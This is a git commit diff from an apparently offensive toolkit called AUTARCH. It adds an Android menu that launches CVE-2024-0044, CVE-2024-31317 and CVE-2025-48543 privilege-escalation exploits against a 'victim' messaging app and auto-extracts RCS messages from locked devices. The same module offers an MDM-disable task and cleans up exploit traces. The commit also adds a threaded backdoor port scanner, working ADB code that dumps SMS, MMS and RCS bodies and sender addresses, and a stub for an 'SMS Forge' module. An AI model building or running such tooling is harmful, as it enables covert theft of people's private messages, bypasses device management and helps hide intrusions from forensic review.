No One Can Stop Me Now
This commit is contained in:
@@ -1,10 +1,18 @@
|
||||
"""
|
||||
Android Root Methods - Root detection, Magisk install, exploit-based rooting
|
||||
Android Root Methods v2.0 — Root detection, Magisk, CVE exploits, GrapheneOS support
|
||||
|
||||
Privilege escalation paths:
|
||||
CVE-2024-0044 — run-as any app UID (Android 12-13, pre-Oct 2024)
|
||||
CVE-2024-31317 — Zygote injection (Android 12-14, pre-Mar 2024, NOT GrapheneOS)
|
||||
fastboot boot — temp root via Magisk-patched image (unlocked bootloader)
|
||||
Pixel GPU — kernel root via Mali driver (CVE-2023-6241, CVE-2025-0072)
|
||||
Magisk — standard Magisk install + patch workflow
|
||||
adb root — userdebug/eng builds only
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Android root methods (Magisk, exploits, root detection)"
|
||||
DESCRIPTION = "Android root methods (CVE-2024-0044, CVE-2024-31317, Magisk, fastboot, GrapheneOS)"
|
||||
AUTHOR = "AUTARCH"
|
||||
VERSION = "1.0"
|
||||
VERSION = "2.0"
|
||||
CATEGORY = "offense"
|
||||
|
||||
import sys
|
||||
@@ -13,7 +21,7 @@ sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
|
||||
|
||||
|
||||
class AndroidRoot:
|
||||
"""Interactive menu for Android rooting operations."""
|
||||
"""Interactive menu for Android rooting and privilege escalation."""
|
||||
|
||||
def __init__(self):
|
||||
from core.android_exploit import get_exploit_manager
|
||||
@@ -48,16 +56,24 @@ class AndroidRoot:
|
||||
return self.serial is not None
|
||||
|
||||
def show_menu(self):
|
||||
print(f"\n{'='*50}")
|
||||
print(" Root Methods")
|
||||
print(f"{'='*50}")
|
||||
print(f"\n{'='*55}")
|
||||
print(" Root Methods & Privilege Escalation")
|
||||
print(f"{'='*55}")
|
||||
print(f" Device: {self.serial or '(none)'}")
|
||||
print()
|
||||
print(" [1] Check Root Status")
|
||||
print(" [2] Install Magisk APK")
|
||||
print(" [3] Pull Patched Boot Image")
|
||||
print(" [4] Root via Exploit")
|
||||
print(" [5] ADB Root Shell (debug builds)")
|
||||
print(" [2] Vulnerability Assessment")
|
||||
print(" [3] Detect OS (Stock / GrapheneOS)")
|
||||
print(" [4] CVE-2024-0044 — run-as any app UID")
|
||||
print(" [5] CVE-2024-31317 — Zygote injection")
|
||||
print(" [6] Install Magisk APK")
|
||||
print(" [7] Pull Patched Boot Image")
|
||||
print(" [8] Fastboot Temp Root (boot patched image)")
|
||||
print(" [9] Root via Exploit Binary")
|
||||
print(" [a] ADB Root Shell (debug builds)")
|
||||
print(" [r] Extract RCS (auto-select best exploit)")
|
||||
print(" [e] CVE-2025-48543 — system UID (Android 15/16)")
|
||||
print(" [c] Cleanup CVE-2024-0044 Traces")
|
||||
print(" [s] Select Device")
|
||||
print(" [0] Back")
|
||||
print()
|
||||
@@ -72,11 +88,76 @@ class AndroidRoot:
|
||||
print(f" Method: {result['method']}")
|
||||
if result['version']:
|
||||
print(f" Version: {result['version']}")
|
||||
details = result.get('details', {})
|
||||
if details:
|
||||
print(f" Details:")
|
||||
for k, v in details.items():
|
||||
print(f" {k}: {v}")
|
||||
for k, v in result.get('details', {}).items():
|
||||
print(f" {k}: {v}")
|
||||
|
||||
def vuln_assessment(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
print(" Assessing vulnerabilities...")
|
||||
result = self.mgr.assess_vulnerabilities(self.serial)
|
||||
oi = result['os_info']
|
||||
print(f"\n OS: {'GrapheneOS' if oi.get('is_grapheneos') else 'Stock Android'}")
|
||||
print(f" Model: {oi.get('model', '?')} ({oi.get('brand', '?')})")
|
||||
print(f" Android: {oi.get('android_version', '?')} (SDK {oi.get('sdk', '?')})")
|
||||
print(f" Patch: {oi.get('security_patch', '?')}")
|
||||
print(f" Bootloader: {'UNLOCKED' if oi.get('bootloader_unlocked') else 'LOCKED'}")
|
||||
print(f" Kernel: {oi.get('kernel', '?')}")
|
||||
print(f"\n Exploitable: {result['exploitable_count']}")
|
||||
print(f" Kernel root: {'YES' if result['has_kernel_root'] else 'NO'}")
|
||||
print(f" App UID: {'YES' if result['has_app_uid'] else 'NO'}")
|
||||
for v in result['vulnerabilities']:
|
||||
m = '[!]' if v.get('exploitable') else '[ ]'
|
||||
print(f"\n {m} {v.get('cve', 'N/A'):20s} {v['name']}")
|
||||
print(f" Type: {v['type']} | Severity: {v.get('severity', '?')}")
|
||||
if v.get('note'):
|
||||
print(f" Note: {v['note']}")
|
||||
|
||||
def detect_os(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
info = self.mgr.detect_os_type(self.serial)
|
||||
print(f"\n Brand: {info.get('brand', '?')}")
|
||||
print(f" Model: {info.get('model', '?')}")
|
||||
print(f" Android: {info.get('android_version', '?')} (SDK {info.get('sdk', '?')})")
|
||||
print(f" Patch: {info.get('security_patch', '?')}")
|
||||
print(f" Pixel: {'YES' if info.get('is_pixel') else 'NO'}")
|
||||
print(f" GrapheneOS: {'YES' if info.get('is_grapheneos') else 'NO'}")
|
||||
print(f" Hardened Malloc: {'YES' if info.get('hardened_malloc') else 'NO'}")
|
||||
print(f" Bootloader: {'UNLOCKED' if info.get('bootloader_unlocked') else 'LOCKED'}")
|
||||
|
||||
def cve_0044(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
try:
|
||||
target = input(" Target package [com.google.android.apps.messaging]: ").strip()
|
||||
except (EOFError, KeyboardInterrupt):
|
||||
return
|
||||
if not target:
|
||||
target = 'com.google.android.apps.messaging'
|
||||
print(f" Exploiting CVE-2024-0044 against {target}...")
|
||||
result = self.mgr.exploit_cve_2024_0044(self.serial, target)
|
||||
if result['success']:
|
||||
print(f"\n SUCCESS! {result['message']}")
|
||||
print(f" Victim: {result['victim_name']} UID: {result['target_uid']}")
|
||||
else:
|
||||
print(f"\n FAILED: {result.get('error', 'Unknown')}")
|
||||
|
||||
def cve_31317(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
try:
|
||||
target = input(" Target package [com.google.android.apps.messaging]: ").strip()
|
||||
except (EOFError, KeyboardInterrupt):
|
||||
return
|
||||
if not target:
|
||||
target = 'com.google.android.apps.messaging'
|
||||
print(f" Exploiting CVE-2024-31317 against {target}...")
|
||||
result = self.mgr.exploit_cve_2024_31317(self.serial, target)
|
||||
if result['success']:
|
||||
print(f"\n SUCCESS! {result['message']}")
|
||||
else:
|
||||
print(f"\n FAILED: {result.get('error', 'Unknown')}")
|
||||
|
||||
def install_magisk(self):
|
||||
if not self._ensure_device():
|
||||
@@ -87,26 +168,37 @@ class AndroidRoot:
|
||||
return
|
||||
if not apk:
|
||||
return
|
||||
print(" Installing Magisk APK...")
|
||||
result = self.mgr.install_magisk(self.serial, apk)
|
||||
if result['success']:
|
||||
print(" Magisk installed successfully.")
|
||||
print(" Next: Open Magisk app, patch boot image, then flash patched boot.")
|
||||
print(" Magisk installed. Open app → patch boot image → use [8] to temp boot.")
|
||||
else:
|
||||
print(f" Error: {result.get('error', result.get('output', 'Failed'))}")
|
||||
|
||||
def pull_patched(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
print(" Looking for patched boot image...")
|
||||
result = self.mgr.pull_patched_boot(self.serial)
|
||||
if result['success']:
|
||||
size_mb = result['size'] / (1024 * 1024)
|
||||
print(f" Saved: {result['local_path']} ({size_mb:.1f} MB)")
|
||||
print(" Next: Reboot to fastboot, flash this as boot partition.")
|
||||
print(f" Saved: {result['local_path']} ({result['size'] / (1024*1024):.1f} MB)")
|
||||
else:
|
||||
print(f" Error: {result.get('error', 'Failed')}")
|
||||
|
||||
def fastboot_root(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
try:
|
||||
img = input(" Patched boot/init_boot image: ").strip()
|
||||
except (EOFError, KeyboardInterrupt):
|
||||
return
|
||||
if not img:
|
||||
return
|
||||
print(" Booting patched image via fastboot (temp root, no flash)...")
|
||||
result = self.mgr.fastboot_temp_root(self.serial, img)
|
||||
if result['success']:
|
||||
print(f"\n {result['message']}")
|
||||
else:
|
||||
print(f"\n FAILED: {result.get('error', '')}")
|
||||
|
||||
def root_exploit(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
@@ -116,23 +208,77 @@ class AndroidRoot:
|
||||
return
|
||||
if not exploit:
|
||||
return
|
||||
print(" Deploying and executing exploit...")
|
||||
result = self.mgr.root_via_exploit(self.serial, exploit)
|
||||
if result['success']:
|
||||
print(" ROOT OBTAINED!")
|
||||
else:
|
||||
print(" Root not obtained.")
|
||||
print(f" Exploit output:\n{result.get('exploit_output', '')}")
|
||||
print(" ROOT OBTAINED!" if result['success'] else " Root not obtained.")
|
||||
print(f" Output:\n{result.get('exploit_output', '')}")
|
||||
|
||||
def adb_root(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
print(" Attempting adb root (userdebug/eng builds only)...")
|
||||
result = self.mgr.adb_root_shell(self.serial)
|
||||
if result['success']:
|
||||
print(" ADB running as root.")
|
||||
print(" ADB running as root." if result['success'] else f" Failed: {result['output']}")
|
||||
|
||||
def extract_rcs_auto(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
print(" Auto-selecting best exploit for RCS extraction...")
|
||||
result = self.mgr.extract_rcs_locked_device(self.serial)
|
||||
if result.get('success'):
|
||||
print(f"\n SUCCESS — method: {result.get('extraction_method')}")
|
||||
print(f" Output: {result.get('output_dir', '?')}")
|
||||
if result.get('pull_command'):
|
||||
print(f" Pull: {result['pull_command']}")
|
||||
if result.get('encrypted'):
|
||||
print(" Note: Database is encrypted — key material included in shared_prefs/")
|
||||
else:
|
||||
print(f" Failed: {result['output']}")
|
||||
print(f"\n FAILED — {result.get('extraction_method', 'no method worked')}")
|
||||
for method in result.get('methods_tried', []):
|
||||
print(f" Tried: {method}")
|
||||
fb = result.get('fallback', {})
|
||||
if fb.get('sms_mms_available'):
|
||||
print(f" Fallback: {fb['sms_count']} SMS/MMS messages available via content providers")
|
||||
if fb.get('note'):
|
||||
print(f" {fb['note']}")
|
||||
|
||||
def cve_48543(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
print(" Tasks: extract_rcs, extract_app:<pkg>, disable_mdm, shell")
|
||||
try:
|
||||
task = input(" Task [extract_rcs]: ").strip()
|
||||
except (EOFError, KeyboardInterrupt):
|
||||
return
|
||||
if not task:
|
||||
task = 'extract_rcs'
|
||||
print(f" Exploiting CVE-2025-48543 (task: {task})...")
|
||||
result = self.mgr.exploit_cve_2025_48543(self.serial, task)
|
||||
if result.get('success'):
|
||||
print(f"\n SUCCESS! UID: {result.get('uid_achieved')}")
|
||||
print(f" Output: {result.get('output_dir', '?')}")
|
||||
if result.get('pull_command'):
|
||||
print(f" Pull: {result['pull_command']}")
|
||||
if result.get('extracted_files'):
|
||||
print(f" Files: {len(result['extracted_files'])}")
|
||||
else:
|
||||
err = result.get('error', 'Unknown')
|
||||
print(f"\n FAILED: {err}")
|
||||
if result.get('manual_steps'):
|
||||
print("\n Manual steps needed:")
|
||||
for step in result['manual_steps']:
|
||||
print(f" {step}")
|
||||
|
||||
def cleanup(self):
|
||||
if not self._ensure_device():
|
||||
return
|
||||
try:
|
||||
victim = input(" Victim name from CVE-2024-0044: ").strip()
|
||||
except (EOFError, KeyboardInterrupt):
|
||||
return
|
||||
if not victim:
|
||||
return
|
||||
result = self.mgr.cleanup_cve_2024_0044(self.serial, victim)
|
||||
for line in result.get('cleanup', []):
|
||||
print(f" {line}")
|
||||
|
||||
def run_interactive(self):
|
||||
while True:
|
||||
@@ -144,12 +290,11 @@ class AndroidRoot:
|
||||
if choice == '0':
|
||||
break
|
||||
actions = {
|
||||
'1': self.check_root,
|
||||
'2': self.install_magisk,
|
||||
'3': self.pull_patched,
|
||||
'4': self.root_exploit,
|
||||
'5': self.adb_root,
|
||||
's': self._select_device,
|
||||
'1': self.check_root, '2': self.vuln_assessment, '3': self.detect_os,
|
||||
'4': self.cve_0044, '5': self.cve_31317, '6': self.install_magisk,
|
||||
'7': self.pull_patched, '8': self.fastboot_root, '9': self.root_exploit,
|
||||
'a': self.adb_root, 'r': self.extract_rcs_auto, 'e': self.cve_48543,
|
||||
'c': self.cleanup, 's': self._select_device,
|
||||
}
|
||||
action = actions.get(choice)
|
||||
if action:
|
||||
|
||||
@@ -370,7 +370,9 @@ class HackHijackService:
|
||||
def scan_target(self, target: str, scan_type: str = 'quick',
|
||||
custom_ports: List[int] = None,
|
||||
timeout: float = 3.0,
|
||||
progress_cb=None) -> ScanResult:
|
||||
progress_cb=None,
|
||||
port_found_cb=None,
|
||||
status_cb=None) -> ScanResult:
|
||||
"""Scan a target for open ports and backdoor indicators.
|
||||
|
||||
scan_type: 'quick' (signature ports only), 'full' (signature + extra),
|
||||
@@ -396,11 +398,16 @@ class HackHijackService:
|
||||
|
||||
# Try nmap first if requested and available
|
||||
if scan_type == 'nmap':
|
||||
if status_cb:
|
||||
status_cb('Running nmap scan…')
|
||||
nmap_result = self._nmap_scan(target, ports, timeout)
|
||||
if nmap_result:
|
||||
result.open_ports = nmap_result.get('ports', [])
|
||||
result.os_guess = nmap_result.get('os', '')
|
||||
result.nmap_raw = nmap_result.get('raw', '')
|
||||
if port_found_cb:
|
||||
for pr in result.open_ports:
|
||||
port_found_cb(pr)
|
||||
|
||||
# Fallback: socket-based scan
|
||||
if not result.open_ports:
|
||||
@@ -408,28 +415,40 @@ class HackHijackService:
|
||||
total = len(sorted_ports)
|
||||
results_lock = threading.Lock()
|
||||
open_ports = []
|
||||
scanned = [0]
|
||||
|
||||
def scan_port(port):
|
||||
if status_cb:
|
||||
status_cb(f'Socket scanning {total} ports on {target}…')
|
||||
|
||||
def scan_port(port, idx):
|
||||
pr = self._check_port(target, port, timeout)
|
||||
with results_lock:
|
||||
scanned[0] += 1
|
||||
done = scanned[0]
|
||||
if pr and pr.state == 'open':
|
||||
with results_lock:
|
||||
open_ports.append(pr)
|
||||
if port_found_cb:
|
||||
port_found_cb(pr)
|
||||
if progress_cb and done % 10 == 0:
|
||||
progress_cb(done, total, f'Scanning port {port}…')
|
||||
|
||||
# Threaded scan — 50 concurrent threads
|
||||
threads = []
|
||||
for i, port in enumerate(sorted_ports):
|
||||
t = threading.Thread(target=scan_port, args=(port,), daemon=True)
|
||||
t = threading.Thread(target=scan_port, args=(port, i), daemon=True)
|
||||
threads.append(t)
|
||||
t.start()
|
||||
if len(threads) >= 50:
|
||||
for t in threads:
|
||||
t.join(timeout=timeout + 2)
|
||||
threads.clear()
|
||||
if progress_cb and i % 10 == 0:
|
||||
progress_cb(i, total)
|
||||
for t in threads:
|
||||
t.join(timeout=timeout + 2)
|
||||
|
||||
if progress_cb:
|
||||
progress_cb(total, total, 'Scan complete')
|
||||
|
||||
result.open_ports = sorted(open_ports, key=lambda p: p.port)
|
||||
|
||||
# Match open ports against backdoor signatures
|
||||
|
||||
@@ -298,13 +298,15 @@ class RCSTools:
|
||||
|
||||
def _content_query(self, uri: str, projection: str = '', where: str = '',
|
||||
sort: str = '', limit: int = 0) -> List[Dict[str, str]]:
|
||||
# Build shell command — use single quotes for sort/where to avoid
|
||||
# Windows double-quote stripping issues
|
||||
cmd = f'shell content query --uri {uri}'
|
||||
if projection:
|
||||
cmd += f' --projection {projection}'
|
||||
if where:
|
||||
cmd += f' --where "{where}"'
|
||||
cmd += f" --where '{where}'"
|
||||
if sort:
|
||||
cmd += f' --sort "{sort}"'
|
||||
cmd += f" --sort '{sort}'"
|
||||
output = self._run_adb(cmd, timeout=30)
|
||||
rows = self._parse_content_query(output)
|
||||
if limit > 0:
|
||||
@@ -659,6 +661,121 @@ class RCSTools:
|
||||
row['date_formatted'] = self._format_ts(int(row['date']) * 1000)
|
||||
return rows
|
||||
|
||||
def read_rcs_via_mms(self, thread_id: Optional[int] = None, limit: int = 200) -> List[Dict[str, Any]]:
|
||||
"""Read RCS messages via the MMS content provider.
|
||||
|
||||
DISCOVERY: Google Messages writes ALL RCS messages to content://mms/
|
||||
as MMS records. The message body is in content://mms/{id}/part
|
||||
(ct=text/plain). RCS metadata (group name, SIP conference URI) is
|
||||
protobuf-encoded in the tr_id field. Sender addresses are in
|
||||
content://mms/{id}/addr.
|
||||
|
||||
This works on ANY Android with ADB access (UID 2000) — no root,
|
||||
no exploits, no Shizuku needed. Tested on Pixel 10 Pro Fold,
|
||||
Android 16, February 2026 patch.
|
||||
"""
|
||||
# Get MMS entries (which include RCS messages synced by Google Messages)
|
||||
where = f'thread_id={thread_id}' if thread_id else ''
|
||||
mms_rows = self._content_query(
|
||||
MMS_URI,
|
||||
projection='_id:thread_id:date:msg_box:sub:text_only:tr_id',
|
||||
where=where,
|
||||
sort='date DESC',
|
||||
limit=limit,
|
||||
)
|
||||
|
||||
messages = []
|
||||
for row in mms_rows:
|
||||
mms_id = row.get('_id')
|
||||
if not mms_id:
|
||||
continue
|
||||
|
||||
msg = {
|
||||
'_id': mms_id,
|
||||
'thread_id': row.get('thread_id'),
|
||||
'date': row.get('date'),
|
||||
'msg_box': row.get('msg_box'),
|
||||
'direction': 'incoming' if row.get('msg_box') == '1' else 'outgoing',
|
||||
'tr_id': row.get('tr_id', ''),
|
||||
'is_rcs': False,
|
||||
'body': '',
|
||||
'addresses': [],
|
||||
}
|
||||
|
||||
# Check if this is an RCS message (tr_id starts with "proto:")
|
||||
tr_id = row.get('tr_id', '') or ''
|
||||
if tr_id.startswith('proto:'):
|
||||
msg['is_rcs'] = True
|
||||
msg['protocol_name'] = 'RCS'
|
||||
# Try to decode group/conversation name from protobuf
|
||||
msg['rcs_metadata'] = tr_id[:100]
|
||||
else:
|
||||
msg['protocol_name'] = 'MMS'
|
||||
|
||||
# Get message body from parts
|
||||
parts = self._content_query(
|
||||
f'content://mms/{mms_id}/part',
|
||||
projection='_id:ct:text',
|
||||
)
|
||||
for p in parts:
|
||||
if p.get('ct') == 'text/plain' and p.get('text'):
|
||||
msg['body'] = p['text']
|
||||
break
|
||||
|
||||
# Get sender/recipient addresses
|
||||
addrs = self._content_query(
|
||||
f'content://mms/{mms_id}/addr',
|
||||
projection='address:type',
|
||||
)
|
||||
for a in addrs:
|
||||
addr = a.get('address', '')
|
||||
addr_type = a.get('type', '')
|
||||
if addr and addr != 'insert-address-token':
|
||||
msg['addresses'].append({'address': addr, 'type': addr_type})
|
||||
# Type 137 = FROM, 151 = BCC/self, 130 = TO
|
||||
if addr_type == '137':
|
||||
msg['sender'] = addr
|
||||
|
||||
# Format timestamp (MMS dates are in seconds, not ms)
|
||||
if msg['date']:
|
||||
try:
|
||||
ts = int(msg['date'])
|
||||
if ts < 10000000000: # seconds
|
||||
ts *= 1000
|
||||
msg['date_ms'] = ts
|
||||
msg['date_formatted'] = self._format_ts(ts)
|
||||
except (ValueError, TypeError):
|
||||
pass
|
||||
|
||||
messages.append(msg)
|
||||
|
||||
return messages
|
||||
|
||||
def read_rcs_only(self, limit: int = 200) -> List[Dict[str, Any]]:
|
||||
"""Read ONLY RCS messages (filter MMS entries with proto: in tr_id)."""
|
||||
all_mms = self.read_rcs_via_mms(limit=limit * 2)
|
||||
return [m for m in all_mms if m.get('is_rcs')][:limit]
|
||||
|
||||
def read_rcs_threads(self) -> List[Dict[str, Any]]:
|
||||
"""Get unique RCS conversation threads with latest message."""
|
||||
all_rcs = self.read_rcs_via_mms(limit=5000)
|
||||
threads = {}
|
||||
for msg in all_rcs:
|
||||
tid = msg.get('thread_id')
|
||||
if tid and tid not in threads:
|
||||
threads[tid] = {
|
||||
'thread_id': tid,
|
||||
'latest_message': msg.get('body', '')[:100],
|
||||
'latest_date': msg.get('date_formatted', ''),
|
||||
'is_rcs': msg.get('is_rcs', False),
|
||||
'direction': msg.get('direction'),
|
||||
'addresses': msg.get('addresses', []),
|
||||
'message_count': 0,
|
||||
}
|
||||
if tid in threads:
|
||||
threads[tid]['message_count'] += 1
|
||||
return list(threads.values())
|
||||
|
||||
def read_conversations(self, limit: int = 100) -> List[Dict[str, Any]]:
|
||||
rows = self._content_query(MMS_SMS_CONVERSATIONS_URI, limit=limit)
|
||||
return rows
|
||||
@@ -1654,6 +1771,98 @@ class RCSTools:
|
||||
# §10 DATABASE BACKUP & CLONE
|
||||
# ══════════════════════════════════════════════════════════════════════
|
||||
|
||||
def backup_rcs_to_xml(self) -> Dict[str, Any]:
|
||||
"""Backup all RCS messages to SMS Backup & Restore compatible XML.
|
||||
|
||||
Reads RCS messages from the MMS content provider (where Google Messages
|
||||
syncs them as MMS records), extracts the plaintext body from parts,
|
||||
and writes them in SMS Backup & Restore XML format.
|
||||
|
||||
Works on any Android with ADB — no root, no exploits.
|
||||
"""
|
||||
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
|
||||
# Get ALL messages via MMS provider (includes both MMS and RCS)
|
||||
all_msgs = self.read_rcs_via_mms(limit=10000)
|
||||
rcs_msgs = [m for m in all_msgs if m.get('is_rcs')]
|
||||
all_sms = self.read_sms_database(limit=10000)
|
||||
|
||||
# Build XML
|
||||
total = len(all_sms) + len(all_msgs)
|
||||
root = ET.Element('smses', count=str(total), backup_date=str(self._ts_ms()),
|
||||
type='full', autarch_version='2.3')
|
||||
|
||||
# Add SMS messages
|
||||
for msg in all_sms:
|
||||
attrs = {
|
||||
'protocol': str(msg.get('protocol', '0') or '0'),
|
||||
'address': str(msg.get('address', '') or ''),
|
||||
'date': str(msg.get('date', '') or ''),
|
||||
'type': str(msg.get('type', '1') or '1'),
|
||||
'body': str(msg.get('body', '') or ''),
|
||||
'read': str(msg.get('read', '1') or '1'),
|
||||
'status': str(msg.get('status', '-1') or '-1'),
|
||||
'locked': str(msg.get('locked', '0') or '0'),
|
||||
'date_sent': str(msg.get('date_sent', '0') or '0'),
|
||||
'readable_date': str(msg.get('date_formatted', '') or ''),
|
||||
'contact_name': str(msg.get('contact_name', '(Unknown)') or '(Unknown)'),
|
||||
'msg_protocol': 'SMS',
|
||||
}
|
||||
ET.SubElement(root, 'sms', **attrs)
|
||||
|
||||
# Add RCS/MMS messages
|
||||
for msg in all_msgs:
|
||||
# Get sender address
|
||||
sender = msg.get('sender', '')
|
||||
if not sender and msg.get('addresses'):
|
||||
for a in msg['addresses']:
|
||||
if a.get('address') and a['address'] != 'insert-address-token':
|
||||
sender = a['address']
|
||||
break
|
||||
ts_ms = msg.get('date_ms', msg.get('date', '0'))
|
||||
msg_type = '1' if msg.get('direction') == 'incoming' else '2'
|
||||
attrs = {
|
||||
'protocol': '0',
|
||||
'address': sender,
|
||||
'date': str(ts_ms),
|
||||
'type': msg_type,
|
||||
'body': str(msg.get('body', '') or ''),
|
||||
'read': '1',
|
||||
'status': '-1',
|
||||
'locked': '0',
|
||||
'date_sent': str(ts_ms),
|
||||
'readable_date': str(msg.get('date_formatted', '') or ''),
|
||||
'contact_name': '(Unknown)',
|
||||
'msg_protocol': 'RCS' if msg.get('is_rcs') else 'MMS',
|
||||
'thread_id': str(msg.get('thread_id', '') or ''),
|
||||
}
|
||||
# Add RCS metadata if available
|
||||
if msg.get('is_rcs') and msg.get('rcs_metadata'):
|
||||
attrs['rcs_tr_id'] = msg['rcs_metadata']
|
||||
# Add all addresses as comma-separated for group chats
|
||||
if len(msg.get('addresses', [])) > 1:
|
||||
attrs['group_addresses'] = ','.join(
|
||||
a['address'] for a in msg['addresses']
|
||||
if a.get('address') and a['address'] != 'insert-address-token'
|
||||
)
|
||||
ET.SubElement(root, 'sms', **attrs)
|
||||
|
||||
# Write to file
|
||||
backup_path = self._backups_dir / f'rcs_backup_{timestamp}.xml'
|
||||
tree = ET.ElementTree(root)
|
||||
ET.indent(tree, space=' ')
|
||||
tree.write(str(backup_path), encoding='unicode', xml_declaration=True)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'path': str(backup_path),
|
||||
'sms_count': len(all_sms),
|
||||
'mms_count': len(all_msgs) - len(rcs_msgs),
|
||||
'rcs_count': len(rcs_msgs),
|
||||
'total': total,
|
||||
'message': f'Backup saved: {len(all_sms)} SMS + {len(rcs_msgs)} RCS + '
|
||||
f'{len(all_msgs) - len(rcs_msgs)} MMS = {total} total',
|
||||
}
|
||||
|
||||
def full_backup(self, fmt: str = 'json') -> Dict[str, Any]:
|
||||
"""Complete SMS/MMS/RCS backup."""
|
||||
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
|
||||
|
||||
@@ -11,6 +11,12 @@ AUTHOR = "AUTARCH"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "offense"
|
||||
|
||||
|
||||
def run():
|
||||
"""CLI entry point — this module is used via the web UI."""
|
||||
print("SMS Forge is managed through the AUTARCH web interface.")
|
||||
print("Navigate to Offense → SMS Forge in the dashboard.")
|
||||
|
||||
import os
|
||||
import csv
|
||||
import json
|
||||
|
||||
Reference in New Issue
Block a user